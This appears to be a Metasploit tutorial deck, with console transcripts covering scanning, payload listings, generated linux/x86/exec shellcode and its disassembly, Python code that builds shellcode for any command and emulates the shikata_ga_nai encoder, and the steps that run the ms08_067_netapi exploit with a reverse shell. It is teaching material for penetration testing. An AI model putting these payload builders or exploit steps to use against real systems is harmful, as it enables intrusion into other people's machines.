
Page 1

> msfconsole
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090  90909090990909090990909090
       90909090.90909090.90909090  90909090.90909090.90909090
       90909090.90909090.09090900  90909090.90909090.09090900
       ..........................  ..........................
       cccccccccccccccccccccccccc  cccccccccccccccccccccccccc
       ccccccccc.................  cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc  .................ccccccccc
       cccccccccccccccccccccccccc  cccccccccccccccccccccccccc
       ..........................  ..........................
       ffffffffffffffffffffffffff  ffffffff..................
       ffffffffffffffffffffffffff  ffffffff..................
       ffffffff..................  ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
...

       =[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]]
+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msfconsole

Page 2

msfconsole

msf > pwd
[*] exec: pwd

/root
msf > ls -a
[*] exec: ls -a

.

..

.bash_history

.bashrc

.cache

...

msf > help search
Usage: search [keywords]

Keywords:
  app    :  Modules that are client or server attacks
  author :  Modules written by this author
  bid    :  Modules with a matching Bugtraq ID
  cve    :  Modules with a matching CVE ID
  edb    :  Modules with a matching Exploit-DB ID
  name   :  Modules with a matching descriptive name
  ...

Linux commands Help

msf > search cve:2009 type:exploit app:client

Matching Modules
================

   Name                                                                   Disclosure Date  Rank       Description
   ----                                                                   ---------------  ----       -----------
   exploit/multi/browser/firefox_escape_retval                            2009-07-13       normal     Firefox 3.5 escape() Return Value Memory Corruption
   exploit/multi/browser/itms_overflow                                    2009-06-01       great      Apple OS X iTunes 8.1.1 ITMS Overflow
   exploit/windows/browser/symantec_altirisdeployment_downloadandinstall  2009-09-09       excellent  Symantec Altiris Deployment Solution ActiveX Control Arbitrary File ...

Search

Page 3

msfconsole
Database-backing

# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

# service metasploit start
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf3
msf > nmap -Pn -A -oX results.xml 172.15.67.141
[*] exec: nmap -Pn -A -oX results.xml 172.15.67.141
msf > db_import results.xml
msf > hosts -c address
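What `db_import` pulls out of `results.xml` before `hosts -c address` and `services` can list it, as an added example (this is not Metasploit's importer, which is part of the framework's Ruby code): a parser for nmap's `-oX` output that yields one row per host and one per port, and a fixed-width printer in the style of the console tables. The XML document is constructed for the example; it reuses the 172.15.67.141 target from the transcript, but the hostname, ports, banners and OS match are made up.

```python
"""Turn `nmap -oX results.xml` output into the host and service rows that
`db_import` loads, and print them the way `hosts -c address` does.
Added example, not Metasploit's importer. The XML below is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample: one host, two open ports, one filtered port (not real scan data).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -A -oX results.xml 172.15.67.141">
  <host>
    <status state="up"/>
    <address addr="172.15.67.141" addrtype="ipv4"/>
    <hostnames><hostname name="target.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="5.3p1"/>
      </port>
      <port protocol="tcp" portid="3790">
        <state state="open"/>
        <service name="http" product="nginx"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return (hosts, services): one dict per <host>, one dict per <port>."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue                       # no IPv4 address: nothing to key the host on
        address = addr.get("addr")
        hn = host.find("hostnames/hostname")
        osm = host.find("os/osmatch")      # best OS guess, if -A/-O produced one
        status = host.find("status")
        hosts.append({
            "address": address,
            "name": hn.get("name") if hn is not None else "",
            "os_name": osm.get("name") if osm is not None else "",
            "state": status.get("state") if status is not None else "",
        })
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            info = ""
            if svc is not None:
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            services.append({
                "host": address,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "",
                "name": svc.get("name", "") if svc is not None else "",
                "info": info,
            })
    return hosts, services


def open_services(services):
    """Only ports nmap saw as open; filtered/closed ones carry no service to attack."""
    return [s for s in services if s["state"] == "open"]


def render_table(rows, columns):
    """Fixed-width listing like `hosts -c address` / `services` print."""
    widths = {c: max(len(c), *(len(str(r[c])) for r in rows)) for c in columns}
    lines = ["  ".join(c.ljust(widths[c]) for c in columns),
             "  ".join("-" * widths[c] for c in columns)]
    for r in rows:
        lines.append("  ".join(str(r[c]).ljust(widths[c]) for c in columns))
    return "\n".join(lines)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(render_table(hosts, ["address", "name", "os_name"]))
    print()
    print(render_table(open_services(services), ["host", "port", "proto", "name", "info"]))
```

Keeping the XML rather than only the console import is worth it: `results.xml` is the evidence you hand over with the report, and re-parsing it offline lets you check what the database actually recorded (the `-c` option on `hosts` selects columns, exactly as the transcript does with `address`).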

Page 4

> msfconsole
msf > show payloads

Payloads
========

   Name                                  Disclosure Date  Rank    Description
   ----                                  ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                 normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                 normal  AIX execve Shell for inetd
   aix/ppc/shell_reverse_tcp                              normal  AIX Command...
   linux/x86/chmod                                        normal  Linux Chmod
   linux/x86/exec                                         normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                    normal  Linux Meterpreter, Bind TCP Stager (IPv6)
   linux/x86/meterpreter/bind_nonx_tcp                    normal  Linux Meterpreter, Bind TCP Stager...
   windows/shell_bind_tcp                                 normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                            normal  Windows Disable Windows ICF, Command...
   windows/shell_hidden_bind_tcp                          normal  Windows Command Shell, Hidden Bind ...
   windows/shell_reverse_tcp                              normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                    normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                           normal  Windows Upload/Execute, Bind TCP ...
   windows/upexec/bind_nonx_tcp                           normal  Windows Upload/Execute, Bind TCP ...

msfconsole

Page 5

msf > info windows/speak_pwned

       Name: Windows Speech API - Say "You Got Pwned!"
     Module: payload/windows/speak_pwned
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 247
       Rank: Normal

Provided by: Berend-Jan "SkyLined" Wever <[email protected]>

Description: Causes the target to say "You Got Pwned" via the Windows Speech API

msfconsole

Page 6

# msfpayload linux/x86/exec S

       Name: Linux Execute Command
     Module: payload/linux/x86/exec
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 158
       Rank: Normal

Provided by: vlad902 <[email protected]>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
CMD                    yes       The command string to execute

msfpayload

Page 7

# msfpayload linux/x86/exec CMD="/bin/date" C
/*
 * linux/x86/exec - 45 bytes
 * ...
 * AppendExit=false, CMD=/bin/date
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0a\x00\x00\x00\x2f"
"\x62\x69\x6e\x2f\x64\x61\x74\x65\x00\x57\x53\x89\xe1\xcd\x80";

(C)

# msfpayload linux/x86/exec CMD="/bin/date" J
// linux/x86/exec - 45 bytes
// ...
// AppendExit=false, CMD=/bin/date
%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u0ae8%u0000%u2f00%u6962%u2f6e%u6164%u6574%u5700%u8953%ucde1%u4180

(Javascript)

# msfpayload linux/x86/exec CMD="/bin/date" R > foo
# hexdump -C foo
00000000  6a 0b 58 99 52 66 68 2d  63 89 e7 68 2f 73 68 00  |j.X.Rfh-c..h/sh.|
00000010  68 2f 62 69 6e 89 e3 52  e8 0a 00 00 00 2f 62 69  |h/bin..R...../bi|
00000020  6e 2f 64 61 74 65 00 57  53 89 e1 cd 80           |n/date.WS....|

(Raw)

msfpayload

Page 8

# ndisasm -b 32 foo -s 0x27
00000000  6A0B              push byte +0xb
00000002  58                pop eax               ; eax = 0xb (sys_execve)
00000003  99                cdq                   ; edx = 0x0
00000004  52                push edx              ; NUL that terminates "-c"
00000005  66682D63          push word 0x632d      ; TOS = "-c\0"
00000009  89E7              mov edi,esp           ; *edi = "-c\0"
0000000B  682F736800        push dword 0x68732f   ; push "/sh\0"
00000010  682F62696E        push dword 0x6e69622f ; push "/bin"  -> "/bin/sh\0"
00000015  89E3              mov ebx,esp           ; *ebx = "/bin/sh\0"
00000017  52                push edx              ; push 0 (argv terminator)
00000018  E80A000000        call dword 0x27       ; pushes the address of "/bin/date" and skips over it
0000001D  2F                das                   ; "/bin/date\0" - data, not code
0000001E  62696E            bound ebp,[ecx+0x6e]
00000021  2F                das
00000022  6461              fs popad
00000024  7465              jz 0x8b
00000026  00                db 0x00
00000027  57                push edi              ; sync-point: 0x27 (the -s option restarts disassembly here)
00000028  53                push ebx
00000029  89E1              mov ecx,esp           ; ecx = argv
0000002B  CD80              int 0x80

Register state at int 0x80:

eax = 0xb (sys_execve)
ebx -> "/bin/sh\0" (with "-c\0" lying directly above it on the stack)
ecx -> argv = { "/bin/sh", "-c", "/bin/date", NULL }
       (argv[2] is the return address pushed by the call; the NULL is the push edx at 0x17)
edx = 0 (envp = NULL)

In other words the payload runs execve("/bin/sh", ["/bin/sh", "-c", CMD], NULL); the CMD string is carried inline, NUL-terminated, right behind the call.

msfpayload
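The layout read off the disassembly above, as an added example that is not Metasploit's own payload generator: `build_exec_shellcode()` assembles the same bytes msfpayload emitted for `CMD="/bin/date"` (stub, `call` over the NUL-terminated command, execve tail) for any command, `parse_exec_shellcode()` walks a blob back to the syscall number and argv, and `find_bad_chars()` reports the byte offsets an exploit could not deliver. The stub bytes are copied from the listing; the 45-byte reference is the `hexdump -C foo` output on the previous page.

```python
"""Rebuild and take apart the linux/x86/exec shellcode disassembled above.
Added example, not Metasploit's generator; stub bytes are from the listing."""
import struct

# push 0xb; pop eax; cdq; push edx; push word "-c"; mov edi,esp;
# push "/sh\0"; push "/bin"; mov ebx,esp; push edx; E8 (the call's rel32 follows)
STUB_HEAD = bytes.fromhex("6a0b58" "99" "52" "66682d63" "89e7"
                          "682f736800" "682f62696e" "89e3" "52" "e8")
# push edi; push ebx; mov ecx,esp; int 0x80
STUB_TAIL = bytes.fromhex("5753" "89e1" "cd80")
# `msfpayload linux/x86/exec CMD="/bin/date" R`, as shown by hexdump -C foo
FOO = bytes.fromhex("6a0b58995266682d6389e7682f736800"
                    "682f62696e89e352e80a0000002f6269"
                    "6e2f6461746500575389e1cd80")


def build_exec_shellcode(cmd):
    """Stub + CMD: `call` jumps over the NUL-terminated string and leaves its
    address on the stack, which becomes argv[2] when push edi/push ebx follow."""
    cmd_b = cmd.encode()
    if b"\x00" in cmd_b:
        raise ValueError("CMD cannot contain NUL: the string is NUL-terminated in place")
    rel32 = struct.pack("<I", len(cmd_b) + 1)       # skip the string and its NUL
    return STUB_HEAD + rel32 + cmd_b + b"\x00" + STUB_TAIL


def parse_exec_shellcode(sc):
    """Walk a blob with this layout back to the execve() arguments."""
    if sc[:3] != b"\x6a\x0b\x58":                    # push byte 0xb; pop eax
        raise ValueError("not a push 0xb / pop eax prologue")
    if sc[5:7] != b"\x66\x68" or sc[11] != 0x68 or sc[16] != 0x68:
        raise ValueError("unexpected push sequence")
    flag = sc[7:9].decode()                          # push word 0x632d -> "-c"
    # Two dword pushes; the later push lands at the lower address, so it reads first.
    shell = (sc[17:21] + sc[12:16]).rstrip(b"\x00").decode()   # "/bin" + "/sh\0"
    if sc[24] != 0xE8:
        raise ValueError("expected call rel32 at offset 0x18")
    rel = struct.unpack("<I", sc[25:29])[0]
    cmd_b = sc[29:29 + rel]
    if not cmd_b.endswith(b"\x00"):
        raise ValueError("call does not land right after a NUL-terminated string")
    if sc[29 + rel:] != STUB_TAIL:
        raise ValueError("unexpected execve tail")
    return {"syscall": sc[1], "argv": [shell, flag, cmd_b[:-1].decode()], "envp": None}


def find_bad_chars(sc, bad):
    """(offset, byte) for every byte in `bad`, e.g. NUL for a strcpy-style overflow."""
    return [(i, b) for i, b in enumerate(sc) if b in bad]


if __name__ == "__main__":
    assert build_exec_shellcode("/bin/date") == FOO
    print(parse_exec_shellcode(FOO))
    print(find_bad_chars(FOO, b"\x00\x20"))
```

The raw payload carries three NULs of its own (the terminator of "/sh", the high bytes of the call's rel32 and the end of CMD, with the first one at offset 15), which is why it cannot be dropped into a C-string overflow as-is and why the next page runs it through msfencode with `-b '\x00\x20'`.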

Page 9

# msfencode -b '\x00\x20' -i foo -t raw > foo_new
[-] cmd/powershell_base64 failed: Encoding failed due to a bad character (index=15, char=0x00)
[*] x86/shikata_ga_nai succeeded with size 72 (iteration=1)

# ndisasm -b 32 foo_new
00000000  B82BF03A30        mov eax,0x303af02b
00000005  DAD7              fcmovbe st7
00000007  D97424F4          fnstenv [esp-0xc]
0000000B  5D                pop ebp
0000000C  31C9              xor ecx,ecx
0000000E  B10C              mov cl,0xc
00000010  314513            xor [ebp+0x13],eax
00000013  034513            add eax,[ebp+0x13]
00000016  83EDD7            sub ebp,byte -0x29
00000019  12CF              adc cl,bh
0000001B  5A                pop edx
0000001C  2C8B              sub al,0x8b
0000001E  A9C95443E7        test eax,0xe74354c9
00000023  8E11              mov ss,[ecx]
00000025  749F              jz 0xffffffc6
00000027  7F52              jg 0x7b
00000029  1360E8            adc esp,[eax-0x18]
0000002C  BB8109864A        mov ebx,0x4a860981
00000031  A6                cmpsb
00000032  98                cwde
00000033  BE46291D3F        mov esi,0x3f1d2946
00000038  794B              jns 0x85
0000003A  7451              jz 0x8d
0000003C  AA                stosb
0000003D  EF                out dx,eax
0000003E  E7D9              out 0xd9,eax
00000040  D1EF              shr edi,1
00000042  B072              mov al,0x72
00000044  90                nop
00000045  11F3              adc ebx,esi
00000047  F5                cmc

msfencode
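What the decoder stub in that listing does when it runs, as an added example (not Metasploit's encoder code): the 72 bytes of `foo_new` and the 45 bytes of `foo` are transcribed from the two ndisasm listings on this page, and `emulate_shikata()` executes the stub's loop the way the CPU would. The parameters are read from the stub itself: the key from `mov eax`, `ebp` from the `fnstenv`/`pop ebp` trick (it ends up holding the address of the 2-byte FPU instruction in front of `fnstenv`, which is assumed to be the layout of this encoder instance), the iteration count from `mov cl`, and the first target from the `xor [ebp+0x13],eax` displacement. Note that `ebp+0x13` is 0x18, inside the decoder: the immediate of `sub ebp,-4` and the `loop` instruction ship encoded, which is why the disassembler prints `sub ebp,byte -0x29` and `adc cl,bh` there.

```python
"""Emulate the x86/shikata_ga_nai decoder stub from the ndisasm listing above
and recover the original payload. Added example, not Metasploit's code; the
byte strings are transcribed from the two listings on this page."""

# msfencode output (72 bytes), one hex group per disassembled instruction
FOO_NEW = bytes.fromhex(
    "b82bf03a30" "dad7" "d97424f4" "5d" "31c9" "b10c" "314513" "034513"
    "83edd7" "12cf" "5a" "2c8b" "a9c95443e7" "8e11" "749f" "7f52" "1360e8"
    "bb8109864a" "a6" "98" "be46291d3f" "794b" "7451" "aa" "ef" "e7d9" "d1ef"
    "b072" "90" "11f3" "f5")
# The original linux/x86/exec payload (45 bytes) from `hexdump -C foo`
FOO = bytes.fromhex("6a0b58995266682d6389e7682f736800"
                    "682f62696e89e352e80a0000002f6269"
                    "6e2f6461746500575389e1cd80")


def le32(buf, i):
    return int.from_bytes(buf[i:i + 4], "little")


def emulate_shikata(blob):
    """Run the decoder loop; returns (decoded_blob, stub_len)."""
    buf = bytearray(blob)
    if buf[0] != 0xB8:                              # mov eax, imm32 -> initial key
        raise ValueError("expected mov eax, imm32 at offset 0")
    key = le32(buf, 1)
    fnstenv = buf.index(b"\xd9\x74\x24\xf4")        # fnstenv [esp-0xc]
    ebp = fnstenv - 2          # pop ebp -> address of the last FPU op, the 2-byte one before fnstenv
    i = buf.index(b"\xb1", fnstenv)                 # mov cl, N  (dwords to decode)
    count = buf[i + 1]
    j = buf.index(b"\x31\x45", i)                   # xor [ebp+disp8], eax
    disp = buf[j + 2] - 0x100 if buf[j + 2] >= 0x80 else buf[j + 2]
    ptr = ebp + disp                                # first dword to decode
    for _ in range(count):
        plain = le32(buf, ptr) ^ key
        buf[ptr:ptr + 4] = plain.to_bytes(4, "little")
        key = (key + plain) & 0xFFFFFFFF            # add eax,[ebp+disp]: key feeds on plaintext
        ptr += 4                                    # sub ebp,-4
    sub = buf.index(b"\x83\xed", j)                 # sub ebp,imm8 (3 bytes) + loop (2 bytes)
    stub_len = sub + 5
    return bytes(buf), stub_len


def recover_payload(blob):
    decoded, stub_len = emulate_shikata(blob)
    return decoded[stub_len:]


def has_bad_chars(blob, bad=b"\x00\x20"):
    return any(b in bad for b in blob)


if __name__ == "__main__":
    decoded, stub_len = emulate_shikata(FOO_NEW)
    print("decoder tail after decoding:", decoded[0x18:stub_len].hex())   # fc e2 f5
    print("recovered payload matches foo:", recover_payload(FOO_NEW) == FOO)
    print("foo_new free of 0x00/0x20:", not has_bad_chars(FOO_NEW))
```

Two things to take from running it: the decoded bytes at 0x18 read `fc e2 f5`, i.e. `sub ebp,-4; loop 0x10`, so the loop really does close back to the xor; and because each round's key is the previous key plus the plaintext just produced, a static byte-by-byte XOR search will not recover the payload, you have to run (or emulate) the stub. That is also the property that makes the encoder bypass naive signature matching on the raw 45 bytes, and not the property that makes it evade anything that emulates the stub.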

Page 10

# /usr/share/metasploit-framework/tools/nasm_shell.rb
nasm > mov esp,30
00000000  BC1E000000        mov esp,0x1e

nasm_shell.rb

Page 11

Metasploit Framework
I. Information Gathering

msf > nmap -Pn -A -oX results.xml 172.15.67.0/24
[*] exec: nmap -Pn -A -oX results.xml 172.15.67.0/24
...
msf > search portscan
...
   auxiliary/scanner/portscan/ftpbounce   normal  FTP Bounce Port Scanner
   auxiliary/scanner/portscan/syn         normal  TCP SYN Port Scanner
   auxiliary/scanner/portscan/tcp         normal  TCP Port Scanner
...
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > set RHOSTS 172.16.57.141
RHOSTS => 172.16.57.141
msf auxiliary(tcp) > run
[*] 172.16.57.141:3790 - TCP OPEN
...

Page 12

Metasploit Framework
II. Find Vulnerability

• nessus
• nexpose
• scanner modules

Page 13

Metasploit Framework
III. Pick payload

msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf > show options

msf > show payloads
msf > set payload windows/shell/reverse_tcp
msf > show options

msf > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)

msf > set target 3
msf > exploit

IV. Exploit

V. Exploit more

VI. Pivot

Page 14

Metasploit Framework
V. Exploit

Page 15

Credits

• D. Kennedy, J. O'Gorman, D. Kearns, and M. Aharoni, Metasploit: The Penetration Tester's Guide, No Starch Press, 2011.
• S. Ngan, J. Chau, and G. Duguies, EC521 final group project: Metasploit, 2011.